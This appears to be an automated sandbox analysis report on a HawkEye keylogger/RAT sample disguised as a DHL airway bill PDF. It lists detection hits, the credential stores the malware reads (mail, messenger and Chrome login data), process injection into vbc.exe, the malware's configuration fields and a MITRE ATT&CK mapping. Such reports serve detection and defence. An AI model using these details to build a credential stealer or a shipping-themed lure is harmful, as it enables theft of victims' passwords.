            Source: DHL_AWB 518877882999_887755468_pdf.exe, 00000007.00000002.523956583.0000000003203000.00000004.00000001.sdmp | Binary or memory string: avgcsrvx.exe
            Source: DHL_AWB 518877882999_887755468_pdf.exe, 00000007.00000002.523956583.0000000003203000.00000004.00000001.sdmp | Binary or memory string: avgnt.exe
            Source: DHL_AWB 518877882999_887755468_pdf.exe, 00000007.00000002.523956583.0000000003203000.00000004.00000001.sdmp | Binary or memory string: hijackthis.exe
            Source: DHL_AWB 518877882999_887755468_pdf.exe, 00000007.00000002.523956583.0000000003203000.00000004.00000001.sdmp | Binary or memory string: avgui.exe
            Source: DHL_AWB 518877882999_887755468_pdf.exe, 00000007.00000002.523956583.0000000003203000.00000004.00000001.sdmp | Binary or memory string: avgwdsvc.exe
            Source: DHL_AWB 518877882999_887755468_pdf.exe, 00000007.00000002.523956583.0000000003203000.00000004.00000001.sdmp | Binary or memory string: mbam.exe
            Source: DHL_AWB 518877882999_887755468_pdf.exe, 00000007.00000002.523956583.0000000003203000.00000004.00000001.sdmp | Binary or memory string: MsMpEng.exe
            Source: DHL_AWB 518877882999_887755468_pdf.exe, 00000007.00000002.523956583.0000000003203000.00000004.00000001.sdmp | Binary or memory string: ComboFix.exe

            Stealing of Sensitive Information:

            Yara detected MailPassView
            Source: Yara match | File source: 7.2.DHL_AWB 518877882999_887755468_pdf.exe.7de834a.4.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 7.3.DHL_AWB 518877882999_887755468_pdf.exe.4abdbda.2.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 7.2.DHL_AWB 518877882999_887755468_pdf.exe.4291990.2.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 7.3.DHL_AWB 518877882999_887755468_pdf.exe.4abdbda.2.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 7.2.DHL_AWB 518877882999_887755468_pdf.exe.7de834a.4.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 24.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 24.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 7.3.DHL_AWB 518877882999_887755468_pdf.exe.4a65890.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 7.3.DHL_AWB 518877882999_887755468_pdf.exe.4a65890.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 7.2.DHL_AWB 518877882999_887755468_pdf.exe.4291990.2.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 7.2.DHL_AWB 518877882999_887755468_pdf.exe.41f5950.3.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 7.2.DHL_AWB 518877882999_887755468_pdf.exe.7d90000.6.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 7.3.DHL_AWB 518877882999_887755468_pdf.exe.4a65bd5.1.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 7.2.DHL_AWB 518877882999_887755468_pdf.exe.7d90000.6.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 7.2.DHL_AWB 518877882999_887755468_pdf.exe.7d90345.5.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000007.00000002.525571222.000000000330E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000007.00000002.528296707.0000000007D90000.00000004.00020000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000007.00000002.526864554.00000000041F5000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000007.00000003.278922139.0000000004A65000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: DHL_AWB 518877882999_887755468_pdf.exe PID: 2960, type: MEMORYSTR
            Yara detected HawkEye Keylogger
            Source: Yara match | File source: 7.2.DHL_AWB 518877882999_887755468_pdf.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 0.2.DHL_AWB 518877882999_887755468_pdf.exe.5293710.3.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 0.2.DHL_AWB 518877882999_887755468_pdf.exe.5293710.3.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 0.2.DHL_AWB 518877882999_887755468_pdf.exe.5024860.4.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 0.2.DHL_AWB 518877882999_887755468_pdf.exe.4f54640.2.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000000.00000002.290657795.000000000536D000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000007.00000002.523956583.0000000003203000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000007.00000002.517940589.0000000000402000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000000.00000002.289479199.0000000004E84000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: DHL_AWB 518877882999_887755468_pdf.exe PID: 2172, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: DHL_AWB 518877882999_887755468_pdf.exe PID: 2960, type: MEMORYSTR
            Tries to steal Mail credentials (via file registry)
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: strcpy,strcpy,strcpy,strcpy,RegCloseKey, PopPassword | 24_2_00402D74
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: strcpy,strcpy,strcpy,strcpy,RegCloseKey, SMTPPassword | 24_2_00402D74
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: ESMTPPassword | 24_2_004033B1
            Yara detected WebBrowserPassView password recovery tool
            Source: Yara match | File source: 11.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 7.3.DHL_AWB 518877882999_887755468_pdf.exe.4a65bd5.1.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 7.2.DHL_AWB 518877882999_887755468_pdf.exe.41f5950.3.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 11.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 7.3.DHL_AWB 518877882999_887755468_pdf.exe.4a65890.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 7.3.DHL_AWB 518877882999_887755468_pdf.exe.4a65890.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 7.2.DHL_AWB 518877882999_887755468_pdf.exe.7d90345.5.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 7.2.DHL_AWB 518877882999_887755468_pdf.exe.41f5950.3.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 7.2.DHL_AWB 518877882999_887755468_pdf.exe.7d90000.6.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 7.3.DHL_AWB 518877882999_887755468_pdf.exe.4a65bd5.1.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 7.2.DHL_AWB 518877882999_887755468_pdf.exe.7d90000.6.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 7.2.DHL_AWB 518877882999_887755468_pdf.exe.7d90345.5.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000007.00000002.528296707.0000000007D90000.00000004.00020000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000007.00000002.523956583.0000000003203000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000007.00000002.526864554.00000000041F5000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000007.00000003.278922139.0000000004A65000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: DHL_AWB 518877882999_887755468_pdf.exe PID: 2960, type: MEMORYSTR
            Tries to steal Mail credentials (via file access)
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
            Tries to steal Instant Messenger accounts or passwords
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Dynamic Salt
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: Yara match | File source: Process Memory Space: DHL_AWB 518877882999_887755468_pdf.exe PID: 2960, type: MEMORYSTR

            Remote Access Functionality:

            Yara detected HawkEye Keylogger
            Source: Yara match, File source: 7.2.DHL_AWB 518877882999_887755468_pdf.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 0.2.DHL_AWB 518877882999_887755468_pdf.exe.5293710.3.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 0.2.DHL_AWB 518877882999_887755468_pdf.exe.5293710.3.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 0.2.DHL_AWB 518877882999_887755468_pdf.exe.5024860.4.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 0.2.DHL_AWB 518877882999_887755468_pdf.exe.4f54640.2.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 00000000.00000002.290657795.000000000536D000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match, File source: 00000007.00000002.523956583.0000000003203000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match, File source: 00000007.00000002.517940589.0000000000402000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match, File source: 00000000.00000002.289479199.0000000004E84000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match, File source: Process Memory Space: DHL_AWB 518877882999_887755468_pdf.exe PID: 2172, type: MEMORYSTR
            Source: Yara match, File source: Process Memory Space: DHL_AWB 518877882999_887755468_pdf.exe PID: 2960, type: MEMORYSTR
            Detected HawkEye Rat
            Source: DHL_AWB 518877882999_887755468_pdf.exe, 00000000.00000002.290657795.000000000536D000.00000004.00000001.sdmp, String found in binary or memory: _Version_Mutex_Delivery_EmailUsername_EmailPassword_EmailServer_EmailPort_EmailSSL_FTPServer_FTPUsername_FTPPassword_FTPPort_FTPSFTP_ProxyURL_ProxySecret_PanelURL_PanelSecret_LogInterval_PasswordStealer_KeyStrokeLogger_ClipboardLogger_ScreenshotLogger_WebCamLogger_SystemInfo_Install_InstallLocation_InstallFolder_InstallFileName_InstallStartup_InstallStartupPersistance_HistoryCleaner_ZoneID_HideFile_MeltFile_Disablers_DisableTaskManager_DisableCommandPrompt_DisableRegEdit_ProcessProtection_ProcessElevation_AntiVirusKiller_BotKiller_AntiDebugger_ExecutionDelay_FakeMessageShow_FakeMessageTitle_FakeMessageText_FakeMessageIcon_WebsiteVisitor_WebsiteVisitorVisible_WebsiteVisitorSites_WebsiteBlocker_WebsiteBlockerSites_FileBinder_FileBinderFiles
            Source: DHL_AWB 518877882999_887755468_pdf.exe, 00000007.00000002.517940589.0000000000402000.00000040.00000001.sdmp, String found in binary or memory: _Version_Mutex_Delivery_EmailUsername_EmailPassword_EmailServer_EmailPort_EmailSSL_FTPServer_FTPUsername_FTPPassword_FTPPort_FTPSFTP_ProxyURL_ProxySecret_PanelURL_PanelSecret_LogInterval_PasswordStealer_KeyStrokeLogger_ClipboardLogger_ScreenshotLogger_WebCamLogger_SystemInfo_Install_InstallLocation_InstallFolder_InstallFileName_InstallStartup_InstallStartupPersistance_HistoryCleaner_ZoneID_HideFile_MeltFile_Disablers_DisableTaskManager_DisableCommandPrompt_DisableRegEdit_ProcessProtection_ProcessElevation_AntiVirusKiller_BotKiller_AntiDebugger_ExecutionDelay_FakeMessageShow_FakeMessageTitle_FakeMessageText_FakeMessageIcon_WebsiteVisitor_WebsiteVisitorVisible_WebsiteVisitorSites_WebsiteBlocker_WebsiteBlockerSites_FileBinder_FileBinderFiles

            Mitre Att&ck Matrix

            Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
            Valid Accounts | Windows Management Instrumentation 111 | Application Shimming 1 | Application Shimming 1 | Disable or Modify Tools 1 | OS Credential Dumping 1 | System Time Discovery 1 | Remote Services | Archive Collected Data 11 | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
            Default Accounts | Native API 11 | Scheduled Task/Job 1 | Process Injection 412 | Deobfuscate/Decode Files or Information 11 | Credentials in Registry 2 | Account Discovery 1 | Remote Desktop Protocol | Data from Local System 1 | Exfiltration Over Bluetooth | Remote Access Software 1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
            Domain Accounts | Shared Modules 1 | Logon Script (Windows) | Scheduled Task/Job 1 | Obfuscated Files or Information 4 | Credentials In Files 1 | File and Directory Discovery 2 | SMB/Windows Admin Shares | Email Collection 1 | Automated Exfiltration | Steganography | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
            Local Accounts | Scheduled Task/Job 1 | Logon Script (Mac) | Logon Script (Mac) | Software Packing 23 | NTDS | System Information Discovery 19 | Distributed Component Object Model | Clipboard Data 1 | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | | Carrier Billing Fraud
            Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Masquerading 1 | LSA Secrets | Security Software Discovery 231 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
            Replication Through Removable Media | Launchd | Rc.common | Rc.common | Virtualization/Sandbox Evasion 131 | Cached Domain Credentials | Virtualization/Sandbox Evasion 131 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
            External Remote Services | Scheduled Task | Startup Items | Startup Items | Process Injection 412 | DCSync | Process Discovery 4 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
            Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | System Owner/User Discovery 1 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue

            Behavior Graph

            Behavior Graph ID: 502165. Sample: DHL_AWB 518877882999_887755... Startdate: 13/10/2021. Architecture: WINDOWS. Score: 100.
            Sample-level signatures: Malicious sample detected (through community Yara rule); Multi AV Scanner detection for submitted file; Detected unpacking (changes PE section rights); 13 other signatures.
            Process tree recovered from the graph:
            DHL_AWB 518877882999_887755468_pdf.exe (started)
              Dropped files: C:\Users\user\AppData\Roaming\cmsyNzu.exe (PE32); C:\Users\user\...\cmsyNzu.exe:Zone.Identifier (ASCII); C:\Users\user\AppData\Local\...\tmp70BF.tmp (XML); DHL_AWB 5188778829...7755468_pdf.exe.log (ASCII)
              DHL_AWB 518877882999_887755468_pdf.exe (started)
                Signatures: Writes to foreign memory regions; Allocates memory in foreign processes; Sample uses process hollowing technique; Injects a PE file into a foreign processes
                vbc.exe (started)
                  DNS/IP: 192.168.2.1 unknown unknown
                  Signatures: Tries to steal Mail credentials (via file registry); Tries to harvest and steal browser information (history, passwords, etc)
                vbc.exe (started)
                  Signatures: Tries to steal Instant Messenger accounts or passwords; Tries to steal Mail credentials (via file access)
              schtasks.exe (started)
                conhost.exe (started)

            Screenshots


            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            Source | Detection | Scanner | Label
            DHL_AWB 518877882999_887755468_pdf.exe | 33% | Virustotal |
            DHL_AWB 518877882999_887755468_pdf.exe | 100% | Joe Sandbox ML |

            Dropped Files

            Source | Detection | Scanner | Label
            C:\Users\user\AppData\Roaming\cmsyNzu.exe | 100% | Joe Sandbox ML |

            Unpacked PE Files

            Source | Detection | Scanner | Label
            0.2.DHL_AWB 518877882999_887755468_pdf.exe.f40000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen2
            11.2.vbc.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1125438
            7.2.DHL_AWB 518877882999_887755468_pdf.exe.400000.0.unpack | 100% | Avira | TR/Dropper.Gen

            Domains

            No Antivirus matches

            URLs

            Source | Detection | Scanner | Label
            https://deff.nelreports.net/api/report?cat=msn | 0% | URL Reputation | safe
            https://mem.gfx.ms/me/MeControl/10.19168.0/en-US/meCore.min.js | 0% | URL Reputation | safe
            http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe
            http://www.zhongyicts.com.cn | 0% | URL Reputation | safe
            https://pki.goog/repository/0 | 0% | URL Reputation | safe
            https://mem.gfx.ms/meversion?partner=RetailStore2&market=en-us&uhf=1 | 0% | URL Reputation | safe
            http://www.carterandcone.coml | 0% | URL Reputation | safe
            http://crl.pki.goog/gsr2/gsr2.crl0? | 0% | URL Reputation | safe
            http://pki.goog/gsr2/GTSGIAG3.crt0) | 0% | URL Reputation | safe
            http://images.outbrainimg.com/transform/v3/eyJpdSI6IjAxMmRiZGQ2ZTMxY2I0MTYxNmZjOWNjNjExZDU3MzhiY2UwN | 0% | Avira URL Cloud | safe
            http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe
            https://aefd.nelreports.net/api/report?cat=bingth | 0% | URL Reputation | safe
            http://www.typography.netD | 0% | URL Reputation | safe
            http://fontfabrik.com | 0% | URL Reputation | safe
            http://images.outbrainimg.com/transform/v3/eyJpdSI6IjAxOGQyZTYxNTQ5NjE3M2VjYzlkYWMyMWExY2Q4ZDFlYTRmM | 0% | Avira URL Cloud | safe
            http://images.outbrainimg.com/transform/v3/eyJpdSI6IjJkYTFhZDAwNDEyNzQ2M2E3MGUyMWVkZmIxNmUyZjQ2MjBkM | 0% | Avira URL Cloud | safe
            http://www.sandoll.co.kr | 0% | URL Reputation | safe
            http://images.outbrainimg.com/transform/v3/eyJpdSI6ImQ3OGFmNTY2YzEzMzI1ZTIwNzU3Y2FhOTg3NTNjNGRmMzYwZ | 0% | Avira URL Cloud | safe
            http://pomf.cat/upload.php | 0% | Avira URL Cloud | safe
            https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au | 0% | URL Reputation | safe
            http://www.founder.com.cn/cn | 0% | URL Reputation | safe
            http://cookies.onetrust.mgr.consensu.org/onetrust-logo.svg | 0% | URL Reputation | safe
            http://sb.scorecardresearch.com/beacon.js | 0% | Avira URL Cloud | safe
            https://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=5723238221569;gt | 0% | URL Reputation | safe
            http://www.collada.org/2005/11/COLLADASchema9Done | 0% | URL Reputation | safe
            http://www.sajatypeworks.com | 0% | URL Reputation | safe

            Domains and IPs

            Contacted Domains

            No contacted domains info

            URLs from Memory and Binaries

            Name | Source | Malicious | Antivirus Detection | Reputation
            https://googleads.g.doubleclick.net/pagead/html/r20190624/r20190131/zrt_lookup.html | bhvE48A.tmp.11.dr | false | | high
            https://cvision.media.net/new/286x175/2/75/95/36/612b163a-ff7b-498a-bad2-3c52bbd2c504.jpg?v=9 | bhvE48A.tmp.11.dr | false | | high
            http://www.msn.com | bhvE48A.tmp.11.dr | false | | high
            http://www.fontbureau.com/designers | DHL_AWB 518877882999_887755468_pdf.exe, 00000000.00000002.292999870.0000000009932000.00000004.00000001.sdmp | false | | high
            http://www.nirsoft.net | vbc.exe, 0000000B.00000002.301955681.000000000019C000.00000004.00000001.sdmp | false | | high
            https://deff.nelreports.net/api/report?cat=msn | bhvE48A.tmp.11.dr | false | URL Reputation: safe | unknown
            https://contextual.media.net/__media__/js/util/nrrV9140.js | bhvE48A.tmp.11.dr | false | | high
            https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=5657692 | vbc.exe, 0000000B.00000003.299060394.00000000021B4000.00000004.00000001.sdmp, bhvE48A.tmp.11.dr | false | | high
            https://mem.gfx.ms/me/MeControl/10.19168.0/en-US/meCore.min.js | bhvE48A.tmp.11.dr | false | URL Reputation: safe | unknown
            https://www.google.com/chrome/static/images/download-browser/big_pixel_phone.png | bhvE48A.tmp.11.dr | false | | high
            https://www.google.com/chrome/ | bhvE48A.tmp.11.dr | false | | high
            https://s.yimg.com/lo/api/res/1.2/BXjlWewXmZ47HeV5NPvUYA--~A/Zmk9ZmlsbDt3PTYyMjtoPTM2ODthcHBpZD1nZW1 | bhvE48A.tmp.11.dr | false | | high
            https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=7162084889081;g | bhvE48A.tmp.11.dr | false | | high
            https://cvision.media.net/new/286x175/2/79/227/59/931bcbc9-c308-445b-ac87-70a69b051455.jpg?v=9 | bhvE48A.tmp.11.dr | false | | high
            http://www.galapagosdesign.com/DPlease | DHL_AWB 518877882999_887755468_pdf.exe, 00000000.00000002.292999870.0000000009932000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
            https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1https://c | vbc.exe, 0000000B.00000003.299521539.00000000027CA000.00000004.00000001.sdmp | false | | high
            http://www.zhongyicts.com.cn | DHL_AWB 518877882999_887755468_pdf.exe, 00000000.00000002.292999870.0000000009932000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | DHL_AWB 518877882999_887755468_pdf.exe, 00000000.00000002.285852957.0000000003419000.00000004.00000001.sdmp | false | | high
            https://googleads.g.doubleclick.net/pagead/ht66 | vbc.exe, 0000000B.00000002.302227733.0000000000AB0000.00000004.00000040.sdmp | false | | high
            https://www.google.com/chrome/static/images/fallback/icon-file-download.jpg | bhvE48A.tmp.11.dr | false | | high
            http://cdn.adnxs.com/v/s/169/trk.js | bhvE48A.tmp.11.dr | false | | high
            http://s.amazon-adsystem.com/v3/pr?exlist=an&fv=1.0&a=cm&cm3ppd=1 | vbc.exe, 0000000B.00000003.299060394.00000000021B4000.00000004.00000001.sdmp, bhvE48A.tmp.11.dr | false | | high
            https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC5bdddb231cf54f958a5b6e76e9d8eee | bhvE48A.tmp.11.dr | false | | high
            https://optanon.blob.core.windows.net/skins/4.1.0/default_flat_top_two_button_black/v2/css/optanon.c | bhvE48A.tmp.11.dr | false | | high
            https://p.rfihub.com/cm?in=1&pub=345&userid=3011883223893104794 | bhvE48A.tmp.11.dr | false | | high
            https://www.google.com/chrome/static/images/download-browser/pixel_phone.png | bhvE48A.tmp.11.dr | false | | high
            https://www.google.com/chrome/static/images/homepage/hero-anim-top-right.png | bhvE48A.tmp.11.dr | false | | high
            https://optanon.blob.core.windows.net/skins/4.1.0/default_flat_top_two_button_black/v2/images/cookie | bhvE48A.tmp.11.dr | false | | high
            https://pki.goog/repository/0 | bhvE48A.tmp.11.dr | false | URL Reputation: safe | unknown
            https://mem.gfx.ms/meversion?partner=RetailStore2&market=en-us&uhf=1 | bhvE48A.tmp.11.dr | false | URL Reputation: safe | unknown
            http://cm.adform.net/pixel?adform_pid=16&adform_pc=3011883223893104794 | bhvE48A.tmp.11.dr | false | | high
            http://widgets.outbrain.com/external/publishers/msn/MSNIdSync.js | bhvE48A.tmp.11.dr | false | | high
            http://cdn.taboola.com/TaboolaCookieSyncScript.js | bhvE48A.tmp.11.dr | false | | high
            http://www.carterandcone.coml | DHL_AWB 518877882999_887755468_pdf.exe, 00000000.00000002.292999870.0000000009932000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
            http://www.msn.com/ | bhvE48A.tmp.11.dr | false | | high
            https://www.google.com/chrome/static/images/fallback/google-logo-one-color.jpg | bhvE48A.tmp.11.dr | false | | high
            https://www.google.com/chrome/static/images/fallback/icon-help.jpg | bhvE48A.tmp.11.dr | false | | high
            https://www.google.com/accounts/servicelogin | vbc.exe | false | | high
            http://trc.taboola.com/p3p.xml | bhvE48A.tmp.11.dr | false | | high
            http://crl.pki.goog/gsr2/gsr2.crl0? | bhvE48A.tmp.11.dr | false | URL Reputation: safe | unknown
            http://pki.goog/gsr2/GTSGIAG3.crt0) | bhvE48A.tmp.11.dr | false | URL Reputation: safe | unknown
            https://www.google.com/chrome/static/images/fallback/icon-fb.jpg | bhvE48A.tmp.11.dr | false | | high
            http://images.outbrainimg.com/transform/v3/eyJpdSI6IjAxMmRiZGQ2ZTMxY2I0MTYxNmZjOWNjNjExZDU3MzhiY2UwN | bhvE48A.tmp.11.dr | false | Avira URL Cloud: safe | unknown
            http://www.founder.com.cn/cn/bThe | DHL_AWB 518877882999_887755468_pdf.exe, 00000000.00000002.292999870.0000000009932000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
            https://aefd.nelreports.net/api/report?cat=bingth | bhvE48A.tmp.11.dr | false | URL Reputation: safe | unknown
            https://www.google.com/chrome/static/images/homepage/google-canary.png | bhvE48A.tmp.11.dr | false | | high
            http://ib.adnxs.com/getuid?http://s.amazon-adsystem.com/ecm3?id=$UID&ex=appnexus.com | vbc.exe, 0000000B.00000003.299060394.00000000021B4000.00000004.00000001.sdmp, bhvE48A.tmp.11.dr | false | | high
            https://sync.outbrain.com/cookie-sync?p=medianet&uid=2046425540973639000V10 | bhvE48A.tmp.11.dr | false | | high
            https://play.google.com/intl/en_us/badges/images/generic/de_badge_web_generic.png | bhvE48A.tmp.11.dr | false | | high
            https://assets.adobedtm.com/launch-EN7b3d710ac67a4a1195648458258f97dd.min.js | bhvE48A.tmp.11.dr | false | | high
            https://www.google.com/chrome/static/js/main.v2.min.js | bhvE48A.tmp.11.dr | false | | high
            https://www.google.com/chrome/static/images/fallback/icon-description-white-blue-bg.jpg | bhvE48A.tmp.11.dr | false | | high
            https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCfd484f9188564713bbc5d13d862ebbf | bhvE48A.tmp.11.dr | false | | high
            https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=57232382215 | vbc.exe, 0000000B.00000003.298841917.00000000021A3000.00000004.00000001.sdmp, bhvE48A.tmp.11.dr | false | | high
            http://www.typography.netD | DHL_AWB 518877882999_887755468_pdf.exe, 00000000.00000002.292999870.0000000009932000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
            http://fontfabrik.com | DHL_AWB 518877882999_887755468_pdf.exe, 00000000.00000002.292999870.0000000009932000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
            https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2 | bhvE48A.tmp.11.dr | false | | high
            https://www.google.com/chrome/static/images/fallback/icon-youtube.jpg | bhvE48A.tmp.11.dr | false | | high
            http://images.outbrainimg.com/transform/v3/eyJpdSI6IjAxOGQyZTYxNTQ5NjE3M2VjYzlkYWMyMWExY2Q4ZDFlYTRmM | bhvE48A.tmp.11.dr | false | Avira URL Cloud: safe | unknown
            http://images.outbrainimg.com/transform/v3/eyJpdSI6IjJkYTFhZDAwNDEyNzQ2M2E3MGUyMWVkZmIxNmUyZjQ2MjBkM | bhvE48A.tmp.11.dr | false | Avira URL Cloud: safe | unknown
            http://www.fonts.com | DHL_AWB 518877882999_887755468_pdf.exe, 00000000.00000002.292999870.0000000009932000.00000004.00000001.sdmp | false | | high
            http://www.sandoll.co.kr | DHL_AWB 518877882999_887755468_pdf.exe, 00000000.00000002.292999870.0000000009932000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
            https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0 | bhvE48A.tmp.11.dr | false | | high
            http://acdn.adnxs.com/dmp/async_usersync.html?gdpr=1&gdpr_consent=BOi01ZPOi01ZPAcABBENB4-AAAAid7__f_ | bhvE48A.tmp.11.dr | false | | high
            http://pr-bh.ybp.yahoo.com/sync/msft/3011883223893104794?gdpr=1&euconsent=BOi01ZPOi01ZPAcABBENB4-AAA | bhvE48A.tmp.11.dr | false | | high
            http://pr-bh.ybp.yahoo.com/sync/msft/3011883223893104794?gdpr=1&gdpr_consent=BOi01ZPOi01ZPAcABBENB4- | bhvE48A.tmp.11.dr | false | | high
            https://www.google.com/pagead/drt/ui | vbc.exe, 0000000B.00000003.299060394.00000000021B4000.00000004.00000001.sdmp, bhvE48A.tmp.11.dr | false | | high
            http://images.outbrainimg.com/transform/v3/eyJpdSI6ImQ3OGFmNTY2YzEzMzI1ZTIwNzU3Y2FhOTg3NTNjNGRmMzYwZ | bhvE48A.tmp.11.dr | false | Avira URL Cloud: safe | unknown
